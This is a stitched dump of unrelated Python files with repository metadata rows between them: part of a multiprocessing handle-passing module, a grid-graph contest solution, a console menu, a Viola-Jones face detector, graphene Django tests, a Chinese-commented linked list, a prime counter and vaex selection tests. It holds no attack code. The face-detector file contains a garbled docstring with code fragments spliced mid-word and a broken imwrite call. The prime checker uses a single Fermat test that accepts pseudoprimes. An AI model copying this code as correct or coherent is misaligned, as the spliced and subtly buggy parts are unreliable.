                _winapi.DUPLICATE_SAME_ACCESS | _winapi.DUPLICATE_CLOSE_SOURCE)
        finally:
            _winapi.CloseHandle(source_process_handle)
    def send_handle(conn, handle, destination_pid):
        '''Send a handle over a local connection.'''
        # Wrap in a picklable DupHandle; receiver calls .detach() to claim it.
        dh = DupHandle(handle, _winapi.DUPLICATE_SAME_ACCESS, destination_pid)
        conn.send(dh)
    def recv_handle(conn):
        '''Receive a handle over a local connection.'''
        return conn.recv().detach()
    class DupHandle(object):
        '''Picklable wrapper for a handle.'''
        def __init__(self, handle, access, pid=None):
            if pid is None:
                # We just duplicate the handle in the current process and
                # let the receiving process steal the handle.
                pid = os.getpid()
            proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False, pid)
            try:
                self._handle = _winapi.DuplicateHandle(
                    _winapi.GetCurrentProcess(),
                    handle, proc, access, False, 0)
            finally:
                _winapi.CloseHandle(proc)
            self._access = access
            self._pid = pid
        def detach(self):
            '''Get the handle. This should only be called once.'''
            # retrieve handle from process which currently owns it
            if self._pid == os.getpid():
                # The handle has already been duplicated for this process.
                return self._handle
            # We must steal the handle from the process whose pid is self._pid.
            proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False,
                                       self._pid)
            try:
                return _winapi.DuplicateHandle(
                    proc, self._handle, _winapi.GetCurrentProcess(),
                    self._access, False, _winapi.DUPLICATE_CLOSE_SOURCE)
            finally:
                _winapi.CloseHandle(proc)
else:
    # Unix
    __all__ += ['DupFd', 'sendfds', 'recvfds']
    import array
    # On MacOSX we should acknowledge receipt of fds -- see Issue14669
    ACKNOWLEDGE = sys.platform == 'darwin'
    def sendfds(sock, fds):
        '''Send an array of fds over an AF_UNIX socket.'''
        fds = array.array('i', fds)
        # One payload byte encodes len(fds) mod 256 so the receiver can
        # sanity-check how many descriptors arrived.
        msg = bytes([len(fds) % 256])
        sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds)])
        if ACKNOWLEDGE and sock.recv(1) != b'A':
            raise RuntimeError('did not receive acknowledgement of fd')
    def recvfds(sock, size):
        '''Receive an array of fds over an AF_UNIX socket.'''
        a = array.array('i')
        bytes_size = a.itemsize * size
        msg, ancdata, flags, addr = sock.recvmsg(
            1, socket.CMSG_LEN(bytes_size),
        )
        if not msg and not ancdata:
            raise EOFError
        try:
            if ACKNOWLEDGE:
                sock.send(b'A')
            if len(ancdata) != 1:
                raise RuntimeError(
                    'received %d items of ancdata' % len(ancdata),
                )
            cmsg_level, cmsg_type, cmsg_data = ancdata[0]
            # Only SCM_RIGHTS control messages carry file descriptors.
            if (cmsg_level == socket.SOL_SOCKET and
                    cmsg_type == socket.SCM_RIGHTS):
                if len(cmsg_data) % a.itemsize != 0:
                    raise ValueError
                a.frombytes(cmsg_data)
                # The single payload byte must match the fd count mod 256.
                assert len(a) % 256 == msg[0]
                return list(a)
        except (ValueError, IndexError):
            pass
        raise RuntimeError('Invalid data received')
    def send_handle(conn, handle, destination_pid):  # noqa
        '''Send a handle over a local connection.'''
        fd = conn.fileno()
        with socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM) as s:
            sendfds(s, [handle])
    def recv_handle(conn):  # noqa
        '''Receive a handle over a local connection.'''
        fd = conn.fileno()
        with socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM) as s:
            return recvfds(s, 1)[0]
    def DupFd(fd):
        '''Return a wrapper for an fd.'''
        from ..forking import Popen
        return Popen.duplicate_for_child(fd)
#
# Try making some callable types picklable
#
def _reduce_method(m):
    # Reduce a bound/unbound method to a getattr() call so it pickles:
    # unbound -> look the function up on the class; bound -> on the instance.
    if m.__self__ is None:
        return getattr, (m.__class__, m.__func__.__name__)
    else:
        return getattr, (m.__self__, m.__func__.__name__)
class _C:
    # Throwaway class used only to obtain the instance-method type below.
    def f(self):
        pass
register(type(_C().f), _reduce_method)
def _reduce_method_descriptor(m):
    # Reduce an unbound C-level method descriptor (e.g. list.append) to a
    # getattr() on its defining class.
    return getattr, (m.__objclass__, m.__name__)
register(type(list.append), _reduce_method_descriptor)
register(type(int.__add__), _reduce_method_descriptor)
def _reduce_partial(p):
    # Pickle functools.partial by capturing its function, args and keywords
    # (``or {}`` normalises a possible None keywords attribute).
    return _rebuild_partial, (p.func, p.args, p.keywords or {})
def _rebuild_partial(func, args, keywords):
    # Inverse of _reduce_partial: reconstruct the partial on unpickling.
    return functools.partial(func, *args, **keywords)
register(functools.partial, _reduce_partial)
#
# Make sockets picklable
#
if sys.platform == 'win32':
    def _reduce_socket(s):
        # Windows: share via the resource sharer's DupSocket wrapper.
        from ..resource_sharer import DupSocket
        return _rebuild_socket, (DupSocket(s),)
    def _rebuild_socket(ds):
        return ds.detach()
    register(socket.socket, _reduce_socket)
else:
    def _reduce_socket(s):  # noqa
        # Unix: duplicate the underlying fd and record the socket family,
        # type and protocol needed to rebuild it on the other side.
        df = DupFd(s.fileno())
        return _rebuild_socket, (df, s.family, s.type, s.proto)
    def _rebuild_socket(df, family, type, proto):  # noqa
        fd = df.detach()
        return socket.socket(family, type, proto, fileno=fd)
    register(socket.socket, _reduce_socket)
| [
"[email protected]"
]
| |
309933581c5906d2db8e8db38c4eb5949f694987 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03157/s868052818.py | ec6805ad1b92df0a841e5a07b2af49a175993650 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,370 | py | from collections import defaultdict
# Read an H x W grid of '#' (black) / '.' (white) cells from stdin, then sum
# (black count * white count) over every connected component of the graph
# whose edges join orthogonally adjacent cells of DIFFERENT colours.
H, W = map(int, input().split())
S = [input() for _ in range(H)]
es = defaultdict(list)
# For each cell it suffices to scan right/down only: adding both directions
# of each edge here also covers the left/up neighbours.
for i in range(H):
    for j in range(W):
        if j < W-1 and S[i][j] != S[i][j+1]:
            es[(i,j)].append((i,j+1))
            es[(i,j+1)].append((i,j))
        if i < H-1 and S[i][j] != S[i+1][j]:
            es[(i,j)].append((i+1, j))
            es[(i+1,j)].append((i, j))
# NOTE(review): the comprehension variable shadows H; harmless in Python 3
# (comprehensions have their own scope) but rename for clarity if touched.
checked = [[False for _ in range(W)] for H in range(H)]
ans = 0
for i in range(H):
    for j in range(W):
        if checked[i][j] == True:
            continue
        # Breadth-first flood fill of the component containing (i, j),
        # counting black and white cells separately.
        cnt_b = 0
        cnt_w = 0
        if S[i][j] == "#":
            cnt_b += 1
        else:
            cnt_w += 1
        checked[i][j] = True
        stack = es[(i,j)]
        while stack:
            new_stack = []
            for p,q in stack:
                if checked[p][q] == False:
                    checked[p][q] = True
                    if S[p][q] == "#":
                        cnt_b += 1
                    else:
                        cnt_w += 1
                    new_stack.extend(es[(p,q)])
            if len(new_stack) == 0:
                break
            else:
                stack = new_stack
        # Every (black, white) pair inside one component is a valid path pair.
        ans += cnt_b * cnt_w
print(ans)
"[email protected]"
]
| |
79db950c2f9450ff729d2ac03f6271965dd807cf | d5049c3b59b943a158389deaefe9c48970a43c6c | /Lab4/UI.py | e33e0458a9bc51d6e7bef9164a7954f72ed438a3 | []
| no_license | LauraDiosan-CS/lab04-gatsp-DiosDuck | 18e013df30b1a8d0e182190c693cad7da47e68d1 | 647ae011fa5edf7ea4a4187b684f351b0482c328 | refs/heads/master | 2022-04-22T20:47:47.311060 | 2020-03-27T17:59:05 | 2020-03-27T17:59:05 | 250,198,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | from Service import Service
class UI:
    """Console menu: reads commands from stdin and drives a Service."""

    def __init__(self):
        # No service exists until the user picks a problem and a data file.
        self.__service = None

    def main(self):
        """Run the menu loop until the user enters '0'.

        Options '1' and '2' read a filename on the following line, build
        a Service for that problem variant and run it; any other input
        prints "Error".  A missing input file is reported and the loop
        continues instead of crashing.
        """
        while True:
            try:
                option = input()
                if option == "0":
                    return
                if option in ("1", "2"):
                    filename = input()
                    self.__service = Service(filename, int(option))
                    self.__service.prob1()
                    print("Functie terminata")
                else:
                    print("Error")
            except FileNotFoundError:
                print("Fisierul nu exista")
"[email protected]"
]
| |
21b6deb849e7b391aabeb811cc79bf8b7ccee1eb | 21238a26742309adb860a04174ea5360f729ad39 | /SourceCode/.history/Detector_20181224025625.py | b39a3a2293f57ceff29bef9d0e2a2f2758353cac | []
| no_license | Shehabalaa/Viola-Jones-Face-Detection | 5b5d0c3835e0de11658d35941fa3d19468452e93 | b6522b96394df8d67266b41a803bc30a93fc5c49 | refs/heads/master | 2020-04-23T03:08:56.976486 | 2019-06-23T10:39:25 | 2019-06-23T10:39:25 | 170,869,564 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,957 | py | from IntegralImage import toIntegralImage as toII
import cv2
import numpy as np
import random
from sklearn.cluster import MeanShift
from Cascade import Cascade
import itertools
import Utils
from math import floor
from functools import partial
from multiprocessing import Pool
base_detector_width = 24.
def preProcess(image, gamma=2):
image = cv2.blur(image,(5,5))
#image = cv2.equalizeHist(image)
# build a lookup table mapping the pixel values [0, 255] to
# their adjusted gamma values
invGamma = 1.0 / gamma
table = np.array([((i / 255.0) ** invGamma) * 255
for i in np.arange(0, 256)]).astype("uint8")
# apply gamma correction using the lookup table
image =cv2.LUT(image, table)
return image
def meanShift(points):
clustering = MeanShift().fit(points)
return clustering.cluster_centers_
def non_max_suppression_fast(boxes, overlapThresh):
# if there are no boxes, return an empty list
if len(boxes) == 0:
return []
# if the bounding boxes integers, convert them to floats --
# this is important since we'll be doing a bunch of divisions
if boxes.dtype.kind == "i":
boxes = boxes.astype("float")
# initialize the list of picked indexes
pick = []
# grab the coordinates of the bounding boxes
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
# compute the area of the bounding boxes and sort the bounding
# boxes by the bottom-right y-coordinate of the bounding box
area = (x2 - x1 + 1) * (y2 - y1 + 1)
idxs = np.argsort(y2)
# keep looping while some indexes still remain in the indexes
# list
while len(idxs) > 0:
# grab the last index in the indexes list and add the
# index value to the list of picked indexes
last = len(idxs) - 1
i = idxs[last]
pick.append(i)
# find the largest (x, y) coordinates for the start of
# the bounding box and the smallest (x, y) coordinates
# for the end of the bounding box
xx1 = np.maximum(x1[i], x1[idxs[:last]])
yy1 = np.maximum(y1[i], y1[idxs[:last]])
xx2 = np.minimum(x2[i], x2[idxs[:last]])
yy2 = np.minimum(y2[i], y2[idxs[:last]])
# compute the width and height of the bounding box
w = np.maximum(0, xx2 - xx1 + 1)
h = np.maximum(0, yy2 - yy1 + 1)
# compute the ratio of overlap
overlap = (w * h) / area[idxs[:last]]
# delete all indexes from the index list that have
idxs = np.delete(idxs, np.concatenate(([last],
np.where(overlap > overlapThresh)[0])))
# return only the bounding boxes that were picked using the
# integer data type
return boxes[pick].astype("int")
def detect(image,Evaluator):
w_h_pairs=[]
all_detected_squares = []
w = 24 # width and height are equals as i will scan image in squares
h = 24
offset_w = 2
offset_h = 2
image_parts_ranges=[]
image_parts_values=[]
while(w<200 and h < image.shape[0] and w<image.shape[1]):
r = list(range(0, image.shape[0]-h-1,int(offset_h)))
c = list(range(0,image.shape[1]-w-1,int(offset_w)))
new_range = list(itertools.product(r, c))
image_parts_ranges += list(itertools.product(r, c))
image_parts_values += list(map(lambda p: np.array(image[p[0]:p[0]+h, p[1]:p[1]+w]),new_range))
offset_w +=.5
offset_h +=.5
w = int(round(w*1.25))
h = int(round(h*1.25))
#for img in image_parts_values:
# cv2.imshow('a', img)
# cv2.waitKey(0)
image_parts_values = [cv2.resize(img,(24,24)) for img in image_parts_values]
image_parts_values_normalized = list(map(Utils.varianceNormalize,image_parts_values))
ii_parts_values = list(map(toII,image_parts_values_normalized))
all_detected_squares = [(image_parts_ranges[i],image_parts_values[i].shape) for i in Evaluator.predict(ii_parts_values)]
return all_detected_squares
'''
def detectScaleDetector(ii,Evaluator):
w_h_pairs=[]
all_detected_squares = []
w = 80 # width and height are equals as i will scan image in squares
h = int(1.25*(w))
offset_w = 10
offset_h = 10
ii_parts_ranges=[]
ii_parts_values=[]
while(w < ii.shape[0] and w<ii.shape[1]):
r = list(range(0, ii.shape[0]-h,offset_h))
c = list(range(0,ii.shape[1]-w,offset_w))
ii_parts_ranges = list(itertools.product(r, c))
ii_parts_values = list(map(lambda p: ii[p[0]:p[0]+h, p[1]:p[1]+w],ii_parts_ranges))
ii_parts_values = [cv2.resize(ii,(24,24)) for ii in ii_parts_values]
all_detected_squares += [ii_parts_ranges[i] for i in Evaluator.predict(ii_parts_values,(1,1)] #(w/24.,h/24.)
offset_w += 1
offset_h += 1
if(len(all_detected_squares)):
w_h_pairs.append((len(all_detected_squares), w,h))
w = int(round(w*1.5))
return all_detected_squares,w_h_pairs
'''
def main():
Evaluator = Cascade('../Cascade/')
#cap = cv2.VideoCapture(0)
#while(True):
# Capture frame-by-frame
#ret,frame = cap.read()
frame = cv2.imread("faces2.jpg")
frame = cv2.resize(frame,(600,400))
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#cv2.imshow('frame',gray)
#cv2.waitKey(0);
gray = cv2.blur(gray,(5,5))
recs = detect(gray,Evaluator)
#recs,w_h_pairs = detectFast(toII(Utils.varianceNormalize(gray)),Evaluator)
recs = np.array([[recs[i][0][1],recs[i][0][0],recs[i][0][1]+recs[i][1][1],recs[i][0][0]+recs[i][1][0]] for i in range(len(recs))])
recs = non_max_suppression_fast(recs,.1)
[cv2.rectangle(frame,(rec[0],rec[1]),(rec[2],rec[3]), (255, 0, 0), 2) for rec in recs ]
cv2.imshow('frame',frame)
cv2.waitKey(0)
cv2.imwrite("dtectedface2s.jpg")
#cap.release()
#cv2.destroyAllWindows()
if __name__ == "__main__":
main()
"""
Take raw frame before any previos processiong just in gray lvl
return hand's postion as x,y,w,h
w=30
h=30
doubts=[]
imagnge(len(res)):
if(res[i]==1):
doubts.append(pos_of_images_to_detect[i])
doubts2.append(rec_of_images_to_detect[i])
print("Num of Scanned:{0}\nNum of TP:{1}\nNum of FN:{2}\n ".format(len(res),sum(res),len(res)-sum(res)))
return doubts,nonMaxSuppression(doubts2,0.1)
#return nonMaxSuppression(doubts,0.1)
'''
true_point=(0,0)
true_point_doubts=0
for x in range(0,gray.shape[0],40):
for y in range(0,gray.shape[1],40):
tmp_point_doubts=0
for doubt in doubts:
if(doubt[2]>=x>=doubt[0] and doubt[3]>=y>=doubt[1]):
tmp_point_doubts+=1
if(tmp_point_doubts>true_point_doubts):
true_point=(y,x)
true_point_doubts=tmp_point_doubts
return true_point
'''es_to_detect=[]
pos_of_images_to_detect=[]
rec_of_images_to_detect=[]
while(True):
if(w >=gray.shape[0]):
break
w=int(w*2)
h=int(h*2)
for r in range(0,gray.shape[0]-h+1,15):
for c in range(0,gray.shape[1]-w+1,15):
#TODO scalling feature instead of resising image
new = cv2.resize(gray[r:r+h,c:c+w],(28,28))
#new = preProcess(new,1.2)
#cv2.imshow('new',new)
#cv2.waitKey(0)
images_to_detect.append(new)
rec_of_images_to_detect.append((c,r,c+w,r+w)) #append postions not as row and colums
pos_of_images_to_detect.append((int(c+w/2),int(r+w/2))) #append postions not as row and colums
images_ii_to_detect = list(map(toII, images_to_detect))
res = sc.predict(images_ii_to_detect)
doubts2=[]
"""
| [
"[email protected]"
]
| |
eda7d59af2ae751d7b25d53cd82272fde7a20c7d | eb19175c18053e5d414b4f6442bdfd0f9f97e24d | /tests/contrib_django/test_converter.py | 8c04699773df54369df8be04d36665643a5f9a55 | [
"MIT"
]
| permissive | jhgg/graphene | 6c4c5a64b7b0f39c8f6b32d17f62e1c31ca03825 | 67904e8329de3d69fec8c82ba8c3b4fe598afa8e | refs/heads/master | 2020-12-25T21:23:22.556227 | 2015-10-15T19:56:40 | 2015-10-15T19:56:40 | 43,073,008 | 1 | 0 | null | 2015-09-24T14:47:19 | 2015-09-24T14:47:19 | null | UTF-8 | Python | false | false | 3,521 | py | from py.test import raises
from collections import namedtuple
from pytest import raises
import graphene
from graphene import relay
from graphene.contrib.django.converter import (
convert_django_field
)
from graphene.contrib.django.fields import (
ConnectionOrListField,
DjangoModelField
)
from django.db import models
from .models import Article, Reporter
def assert_conversion(django_field, graphene_field, *args):
field = django_field(*args, help_text='Custom Help Text')
graphene_type = convert_django_field(field)
assert isinstance(graphene_type, graphene_field)
assert graphene_type.description == 'Custom Help Text'
return graphene_type
def test_should_unknown_django_field_raise_exception():
with raises(Exception) as excinfo:
convert_django_field(None)
assert 'Don\'t know how to convert the Django field' in str(excinfo.value)
def test_should_date_convert_string():
assert_conversion(models.DateField, graphene.StringField)
def test_should_char_convert_string():
assert_conversion(models.CharField, graphene.StringField)
def test_should_text_convert_string():
assert_conversion(models.TextField, graphene.StringField)
def test_should_email_convert_string():
assert_conversion(models.EmailField, graphene.StringField)
def test_should_slug_convert_string():
assert_conversion(models.SlugField, graphene.StringField)
def test_should_url_convert_string():
assert_conversion(models.URLField, graphene.StringField)
def test_should_auto_convert_id():
assert_conversion(models.AutoField, graphene.IDField)
def test_should_positive_integer_convert_int():
assert_conversion(models.PositiveIntegerField, graphene.IntField)
def test_should_positive_small_convert_int():
assert_conversion(models.PositiveSmallIntegerField, graphene.IntField)
def test_should_small_integer_convert_int():
assert_conversion(models.SmallIntegerField, graphene.IntField)
def test_should_big_integer_convert_int():
assert_conversion(models.BigIntegerField, graphene.IntField)
def test_should_integer_convert_int():
assert_conversion(models.IntegerField, graphene.IntField)
def test_should_boolean_convert_boolean():
field = assert_conversion(models.BooleanField, graphene.BooleanField)
assert field.required is True
def test_should_nullboolean_convert_boolean():
field = assert_conversion(models.NullBooleanField, graphene.BooleanField)
assert field.required is False
def test_should_float_convert_float():
assert_conversion(models.FloatField, graphene.FloatField)
def test_should_manytomany_convert_connectionorlist():
graphene_type = convert_django_field(Reporter._meta.local_many_to_many[0])
assert isinstance(graphene_type, ConnectionOrListField)
assert isinstance(graphene_type.field_type, DjangoModelField)
assert graphene_type.field_type.model == Reporter
def test_should_manytoone_convert_connectionorlist():
graphene_type = convert_django_field(Reporter.articles.related)
assert isinstance(graphene_type, ConnectionOrListField)
assert isinstance(graphene_type.field_type, DjangoModelField)
assert graphene_type.field_type.model == Article
def test_should_onetoone_convert_model():
field = assert_conversion(models.OneToOneField, DjangoModelField, Article)
assert field.model == Article
def test_should_foreignkey_convert_model():
field = assert_conversion(models.ForeignKey, DjangoModelField, Article)
assert field.model == Article
| [
"[email protected]"
]
| |
2f961ffd53ac5c591c95cfb96f730b5bb45915e4 | 133e8c9df1d1725d7d34ea4317ae3a15e26e6c66 | /python/数据结构与算法/02链表/单链表.py | 9acd2da0cfb6f8e8a747ab11e1d4d6a83f289443 | [
"Apache-2.0"
]
| permissive | 425776024/Learn | dfa8b53233f019b77b7537cc340fce2a81ff4c3b | 3990e75b469225ba7b430539ef9a16abe89eb863 | refs/heads/master | 2022-12-01T06:46:49.674609 | 2020-06-01T08:17:08 | 2020-06-01T08:17:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,886 | py | # -*- coding: utf-8 -*-
class Node(object):
def __init__(self, value=None, next=None):
# 这里我们 root 节点默认都是 None,所以都给了默认值
self.value = value # 值
self.next = next # 链接域, 指针
def __str__(self):
"""方便你打出来调试,复杂的代码可能需要断点调试"""
return '<Node: value: {}, next={}>'.format(self.value, self.next.value)
__repr__ = __str__
class LinkedList(object):
'''实现一个单向链表.'''
def __init__(self):
''' 初始化链表: 初始化时,为一个空链表.链表有两个标示head和tail都赋值None.'''
self.head = None
self.tail = None
def append(self, data):
'''
向链表新增元素:
1. 如果该链表是一个空链表,则链表head和tail都指向传进来的node节点.
2. 如果链表非空,则self.tail.next = node.next 指向新插入元素.
3. tail指向新插入的元素节点.
'''
node = Node(data)
if self.head is None:
self.head = node
self.tail = node
else:
self.tail.next = node
self.tail = node
def insert(self, index, value):
'''向链表插入一个元素node.
1. 从链表头开始遍历链表,当查找的index小于要插入索引的位置时,依次
指向下一个元素节点.直到找到要插入节点的索引位置.
2. 首先将插入的值,通过Node类实例化一个元素node.然后将它的next指针
指向它的下一个元素.即当前新元素节点之前的元素索引位置.
3. 将当前元素索引指向新插入元素node.
'''
cur = self.head
node = Node(value)
if index == 0:
node.next = self.head
if self.head is None:
self.tail = node
self.head = node
return
cur_index = 0
while cur_index < index - 1:
cur = cur.next
if cur.next is None:
raise Exception('list length less than index')
cur_index += 1
node.next = cur.next
cur.next = node
if cur.next is None:
self.tail = node
def remove(self, index):
'''从链表中删除一个元素节点.
1. 首先找到要删除的元素节点索引.
2. 然后将当前节点的next指向下一个下一个元素节点.
'''
cur = self.head
cur_index = 0
while cur_index < index-1:
cur = cur.next
if cur is None:
raise Exception('list length less than index')
cur_index +=1
cur.next = cur.next.next
if cur.next is None:
self.tail = cur
def removeEle(self, value):
""" 从链表中删除一个值
"""
cur = self.head
head = None
while cur is not None:
if cur.value == value:
if cur is self.head:
_head = cur.next
self.head = _head
if _head is self.tail:
self.tail = _head
del cur
return True
if cur is self.tail:
head.next = None
self.tail = head
del cur
return True
head.next = cur.next
del cur
return True
head = cur
cur = cur.next
return False
def iter(self):
'''
返回一个链表迭代器.
1. 首先判断该链表是否为一个空链表。如果时一个空链表,直接返回.
2. 如果是一个非空链表,首先指针指向head节点,然后将head节点data
返回.然后while循环,条件是下一个指针元素为真.然后弹出下一个元
素data,直到遍历到最后一个元素.
'''
if not self.head:
return
cur = self.head
yield cur.value
while cur.next:
cur = cur.next
yield cur.value
def __iter__(self):
for i in self.iter():
yield i
if __name__ == "__main__":
linked_list = LinkedList()
# 循环插入元素
for i in range(10):
linked_list.append(i)
# 向元素插入一个元素
linked_list.insert(0, 40)
# 向元素删除一个元素
linked_list.remove(4)
linked_list.removeEle(6)
# 遍历该链表
# for node in linked_list.iter():
# print node
# 遍历该链表
for node in linked_list:
print node
| [
"[email protected]"
]
| |
116cc3115d4ac2f1294d91646a2ab68c1d360cde | eff7a4a914e912eef2bc7a480795cfaae95eac91 | /python/Exercicios/8.16/8.16v2.py | 357d73983e83043c3f6a648ce289af847d27c6f8 | []
| no_license | HenDGS/Aprendendo-Python | fb3cf05d8911a7084c7805a69b8df06f9ce3d311 | 622a83983f3f77e5e74411e016663f05449be537 | refs/heads/master | 2023-08-17T14:17:53.304676 | 2021-09-14T02:51:52 | 2021-09-14T02:51:52 | 294,150,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | import funcao
# Exercise driver: call funcao.funcao with positional and keyword arguments.
# NOTE(review): the keyword ``porência`` looks like a typo for ``potência``;
# it must match the parameter name declared in funcao.py — confirm there.
a=funcao.funcao("camaro","Chevrolet",ano=2015,porência=461)
print(a)
| [
"[email protected]"
]
| |
719ec5e11dce6e24bd6b5f91b3469b407c0160a1 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02257/s888628284.py | 59550bf214754874e7673f5cf26d7edf5cc0ca07 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | # -*- coding: utf-8 -*-
def isPrime(p):
    """Return True iff p is prime (deterministic Miller-Rabin).

    Bug fix: the previous implementation used a single base-2 Fermat
    test (``pow(2, p-1, p) == 1``), which wrongly accepts base-2
    pseudoprimes such as 341 (= 11 * 31) and every Carmichael number
    (561, 1105, ...).  A Miller-Rabin round with the witness set below
    is deterministic for all p < 3.3 * 10**24, far beyond any input
    this problem can produce.  Works unchanged on Python 2 and 3.
    """
    if p < 2:
        return False
    witnesses = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    # Handle small primes directly and reject small-factor composites.
    for q in witnesses:
        if p == q:
            return True
        if p % q == 0:
            return False
    # Write p - 1 = d * 2**s with d odd.
    d = p - 1
    s = 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in witnesses:
        x = pow(a, d, p)
        if x == 1 or x == p - 1:
            continue
        # Square up to s-1 times looking for a nontrivial square root of 1.
        for _ in range(s - 1):
            x = x * x % p
            if x == p - 1:
                break
        else:
            return False  # a is a witness: p is composite
    return True
# Python 2 driver: read n, then n candidate integers, and print how many
# of them are prime.  (raw_input / print-statement syntax is Py2-only.)
n = int(raw_input())
count = 0
for i in range(n):
    if isPrime(int(raw_input())):
        count += 1
print count
"[email protected]"
]
| |
ed222c561a8364dd729c7da79f866fc6f3032907 | 8419f7d24df69a2cb92f04d7369c11c8141b0fcd | /tests/selection_test.py | 50d2e7a9e5f36e1495360ba5839de57cc89d17e9 | [
"MIT"
]
| permissive | heyuqi1970/vaex | c1768eac9d5126e7efd1e139522feb9d65a7ecc9 | 867c180427a23e3b71df47305d7e8866b6673a98 | refs/heads/master | 2021-07-09T08:45:21.634354 | 2020-04-23T17:23:58 | 2020-04-23T17:23:58 | 242,555,084 | 2 | 0 | MIT | 2020-04-24T03:40:17 | 2020-02-23T16:54:13 | Python | UTF-8 | Python | false | false | 6,325 | py | from common import *
def test_selection_basics(df):
    """Named selections, boolean combination modes, and select_inverse."""
    total = df["x"].sum()
    # "default" and a named "inverse" selection partition x over the fixture.
    df.select("x > 5")
    df.select("x <= 5", name="inverse")
    counts = df.count("x", selection=["default", "inverse", "x > 5", "default | inverse"])
    np.testing.assert_array_almost_equal(counts, [4, 6, 4, 10])
    # Subtracting x <= 1 from "inverse" drops two rows from its count.
    df.select("x <= 1", name="inverse", mode="subtract")
    counts = df.count("x", selection=["default", "inverse"])
    np.testing.assert_array_almost_equal(counts, [4, 4])
    total_subset = df["x"].sum(selection=True)
    assert total_subset < total
    # Every registered combination mode must accept a selection with and
    # without an existing current selection (smoke test, no asserts).
    for mode in vaex.selections._select_functions.keys():
        df.select("x > 5")
        df.select("x > 5", mode)
        df.select(None)
        df.select("x > 5", mode)
    # Inverting the default selection must equal selecting the complement.
    df.select("x > 5")
    total_subset = df["x"].sum(selection=True)
    df.select_inverse()
    total_subset_inverse = df["x"].sum(selection=True)
    df.select("x <= 5")
    total_subset_inverse_compare = df["x"].sum(selection=True)
    assert total_subset_inverse == total_subset_inverse_compare
    assert total_subset_inverse + total_subset == total
    # select_inverse also works on a named selection.
    df.select("x > 5")
    df.select("x <= 5", name="inverse")
    df.select_inverse(name="inverse")
    counts = df.count("x", selection=["default", "inverse"])
    np.testing.assert_array_almost_equal(counts, [4, 4])
def test_selection_history(df):
    """Undo/redo bookkeeping of the selection history.

    Walks a select -> refine -> undo -> redo sequence and checks
    has_selection / selection_can_undo / selection_can_redo at every
    step, plus that the selected sums round-trip through undo/redo.

    Bug fix: two comparisons (after selection_undo and selection_redo)
    were bare expressions (``a == b`` with no ``assert``), so they never
    checked anything; they are now real assertions.
    """
    assert not df.has_selection()
    assert not df.selection_can_undo()
    assert not df.selection_can_redo()
    # select_nothing on a fresh df must not create history.
    df.select_nothing()
    assert not df.has_selection()
    assert not df.selection_can_undo()
    assert not df.selection_can_redo()
    total = df["x"].sum()
    assert not df.has_selection()
    assert not df.selection_can_undo()
    assert not df.selection_can_redo()
    df.select("x > 5")
    assert df.has_selection()
    total_subset = df["x"].sum(selection=True)
    assert total_subset < total
    assert df.selection_can_undo()
    assert not df.selection_can_redo()
    # Refine the selection: history grows, redo stays empty.
    df.select("x < 7", mode="and")
    total_subset2 = df["x"].sum(selection=True)
    assert total_subset2 < total_subset
    assert df.selection_can_undo()
    assert not df.selection_can_redo()
    # Undo restores the previous selection's sum.
    df.selection_undo()
    total_subset_same = df["x"].sum(selection=True)
    assert total_subset == total_subset_same
    assert df.selection_can_undo()
    assert df.selection_can_redo()
    # Redo restores the refined selection's sum.
    df.selection_redo()
    total_subset2_same = df["x"].sum(selection=True)
    assert total_subset2 == total_subset2_same
    assert df.selection_can_undo()
    assert not df.selection_can_redo()
    df.selection_undo()
    df.selection_undo()
    assert not df.has_selection()
    assert not df.selection_can_undo()
    assert df.selection_can_redo()
    df.selection_redo()
    assert df.has_selection()
    assert df.selection_can_undo()
    assert df.selection_can_redo()
    # A new selection after an undo discards the redo branch.
    df.select("x < 7", mode="and")
    assert df.selection_can_undo()
    assert not df.selection_can_redo()
    # select_nothing is itself undoable.
    df.select_nothing()
    assert not df.has_selection()
    assert df.selection_can_undo()
    assert not df.selection_can_redo()
    df.selection_undo()
    assert df.selection_can_undo()
    assert df.selection_can_redo()
def test_selection_serialize(df):
    """Selection objects round-trip through to_dict/selection_from_dict."""
    # A SelectionExpression set directly must equal the string form.
    selection_expression = vaex.selections.SelectionExpression("x > 5", None, "and")
    df.set_selection(selection_expression)
    total_subset = df["x"].sum(selection=True)
    df.select("x > 5")
    total_subset_same = df["x"].sum(selection=True)
    assert total_subset == total_subset_same
    # Serialize, deserialize, and check the same rows are selected.
    values = selection_expression.to_dict()
    df.set_selection(vaex.selections.selection_from_dict(values))
    total_subset_same2 = df["x"].sum(selection=True)
    assert total_subset == total_subset_same2
    # A lasso covering all x>5 points AND-combined with the expression
    # selects the same subset.
    selection_expression = vaex.selections.SelectionExpression("x > 5", None, "and")
    selection_lasso = vaex.selections.SelectionLasso("x", "y", [0, 10, 10, 0], [-1, -1, 100, 100], selection_expression, "and")
    df.set_selection(selection_lasso)
